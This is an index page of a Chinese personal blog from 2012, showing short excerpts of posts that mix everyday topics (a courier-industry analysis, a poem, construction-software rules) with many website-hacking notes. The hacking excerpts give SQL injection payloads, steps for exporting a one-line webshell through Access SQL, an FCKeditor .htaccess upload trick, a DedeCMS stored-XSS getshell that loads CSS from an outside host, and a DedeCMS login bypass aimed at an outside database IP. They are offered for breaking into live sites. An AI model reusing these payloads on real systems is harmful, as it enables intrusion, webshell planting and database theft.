酷帥王子'blog

2012-5-14 17:49:55 阅读1993 评论0 142012/05 May14

<?php
/**
* uploadFlash.php
* Flash文件上传.
*/
require_once('../global.inc.php');

//operateId=1 上传,operateId=2 获取地址.
$operateId = intval($_REQUEST['operateId']);
if(empty($operateId)) exit;

if($operateId == 1){
$date = date("Ymd");
$dest = $CONFIG->basePath."data/files/".$date."/";
$COMMON->createDir($dest);

作者 | 2012-5-14 17:49:55 | 阅读(1993) |评论(0) | 阅读全文>>

关于宅急送面对邮政上市的战略分析

2012-5-7 15:55:10 阅读36156 评论0 72012/05 May7

作为宅急送的一员，也颇感压力的巨大，宅急送现在面临的问题是普件市场的丢失与货到付款的服务质量差，还有外网和内网的转换之争，包括零担延误与服务质量严重下滑的困难局面，好在宅急送在民营企业里面的竞争力还是相当强的，他的稳定性，指的是公司承受财务荷载的能力远远要比圆通中通等强，其次他在货到付款领域的绝对优势也可以与邮政有一拼，其次是比较大的覆盖范围，速度相对比其他民营快递要快，如果一旦邮政上市，宅急送面临的问题就更多了，市场份额的减少特别是在代收货款的损失非常巨大，普件方面宅急送主要靠COD客户，而民用方面特别是淘宝方面市场份额非常少，所以表面上看起来非常强大，但是经不住邮政这一上市，然而其他快递公司却不同，他们在淘宝方面做得非常强大，并不担心邮政上市会对他们带来特别大的影响，因为他们很强的价格优势，

作者 | 2012-5-7 15:55:10 | 阅读(36156) |评论(0) | 阅读全文>>

今日

2012-4-24 21:58:11 阅读5179 评论0 242012/04 Apr24

那知昔日胜九天，今日好比苦来咸

朝朝暮暮会有期，不见九天见鬼爷

作者 | 2012-4-24 21:58:11 | 阅读(5179) |评论(0) | 阅读全文>>

广联达软件檐高设置方法

2012-4-20 11:03:51 阅读2249 评论0 202012/04 Apr20

檐高是指室外设计地坪至檐口的高度。建筑物檐高以室外设计地坪标高作为计算起点。
（一）平屋顶带挑檐者，算至挑檐板下皮标高；
（二）平屋顶带女儿墙者，算至屋顶结构板上皮标高；
（三）坡屋面或其它曲面屋顶均算至墙的中心线与屋面板交点的高度；
（四）阶梯式建筑物按高层的建筑物计算檐高；
（五）突出屋面的水箱间、电梯间、亭台楼阁等均不计算檐高。

作者 | 2012-4-20 11:03:51 | 阅读(2249) |评论(0) | 阅读全文>>

惠普笔记本U盘装系统方法

2012-2-22 14:26:23 阅读2185 评论0 222012/02 Feb22

http://bangpai.taobao.com/group/thread/589312-2645

作者 | 2012-2-22 14:26:23 | 阅读(2185) |评论(0) | 阅读全文>>

php+mysql高级爆错注入经测算有效

2012-2-17 14:36:14 阅读2060 评论0 172012/02 Feb17

原文出处：http://hi.baidu.com/pg5yl8/blog/item/57cc3fcae2aed390c8176834.html

http://www.wooyun.org/bugs/wooyun-2010-01666

之前想找个测试没想到这有可以测试下做个记录而已

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+f

作者 | 2012-2-17 14:36:14 | 阅读(2060) |评论(0) | 阅读全文>>

伪造注入点方法

2012-2-16 11:36:48 阅读1349 评论0 162012/02 Feb16

首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表。因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：
ASP/Visual Basic代码

<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL =

作者 | 2012-2-16 11:36:48 | 阅读(1349) |评论(0) | 阅读全文>>

ACCESS执行SQL命令导出一句话SHELL

2012-2-16 11:34:37 阅读277 评论0 162012/02 Feb16

好不容易进了后台，发现啥上传啊。备份啊多木有。
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
文件。可后台没显示这功能。直接填上文件名字，执行命令的选项出来了，
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下：
1.create table cmd (a varchar(50))
2.insert into cmd (a) values (‘‘)
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd

作者 | 2012-2-16 11:34:37 | 阅读(277) |评论(0) | 阅读全文>>

SQL注入直接修改管理员密码的MD5值

2012-2-16 11:29:58 阅读221 评论0 162012/02 Feb16

经常拿站的黑阔们一定经常碰到，某个网站有注入，管理员帐号和密码多暴出来了。
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办？直接修改管理员密码的MD5值。然后进后台！(当然是有条件的。MSSQL)
测试如下：
http://www.tmdsb.com/news.asp?id=121
在地址后输入单引号，显示
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
字符串 ’’’ 之前有未闭合的引号
/news/tmdws.asp，行63
说明没有过滤单引号且数据库是MSSQL.
and 1=1正常。and 1=2出错。肯定存在注入
接着输入

作者 | 2012-2-16 11:29:58 | 阅读(221) |评论(0) | 阅读全文>>

高级暴库方法讲解

2012-2-16 11:28:06 阅读199 评论0 162012/02 Feb16

1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常，说明大于4.0版本，支持ounion查询
2.猜解字段数目,用order by也可以猜，也可以用union select一个一个的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.查看数据库版本及当前用户，

作者 | 2012-2-16 11:28:06 | 阅读(199) |评论(0) | 阅读全文>>

php后台注入与安全

2012-2-16 11:26:56 阅读173 评论0 162012/02 Feb16

php以其跨平台的优越性著称。很多网站采用php编写。因为没有像asp那么多的入侵工具，很多人对php的后台并不重视。
我发现很多的get方式登录的后台，但他们大多都不安全。
我们看一个php登陆代码（GET）：
$conn=mysql_connect("ip","name","pass");

//连接数据库信息

$query="select uid from admin where adminname='$_get["adminname"]'

"and password ='$_get["password"]'";

作者 | 2012-2-16 11:26:56 | 阅读(173) |评论(0) | 阅读全文>>

解决Fckeditor删除所有上传页面如何上传

2012-2-16 11:23:36 阅读143 评论0 162012/02 Feb16

首先,你得确定下Fckeditor的版本。
/FCKeditor/editor/dialog/fck_about.html
其次,你确定下以下几个上传页面是否真的被删除了呢?
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

作者 | 2012-2-16 11:23:36 | 阅读(143) |评论(0) | 阅读全文>>

dedecms xss oday通杀所有版本可getshell

2012-2-16 11:02:49 阅读156 评论0 162012/02 Feb16

<DIV id=read_tpc mb10?>漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行。可getshell
为什么说它是ODay呢，能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个：
1.开启注册
2.开启投稿
注册会员----发表文章
内容填写：
复制代码
<style>@im\port'\http://xxx.com/xss.css';</style>
新建XSS.Css

作者 | 2012-2-16 11:02:49 | 阅读(156) |评论(0) | 阅读全文>>

fck的漏洞，利用htaccess

2012-2-16 11:01:11 阅读151 评论0 162012/02 Feb16

1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html

作者 | 2012-2-16 11:01:11 | 阅读(151) |评论(0) | 阅读全文>>

DedeCms v5.6-5.7 爆严重安全漏洞免账号密码直接进入后台

2012-2-16 10:58:54 阅读156 评论0 162012/02 Feb16

众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息：“DEDECMS爆严重安全漏洞，近期官方会发布相关补丁，望大家及时关注补丁动态。”
入侵步骤如下：
http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOB

作者 | 2012-2-16 10:58:54 | 阅读(156) |评论(0) | 阅读全文>>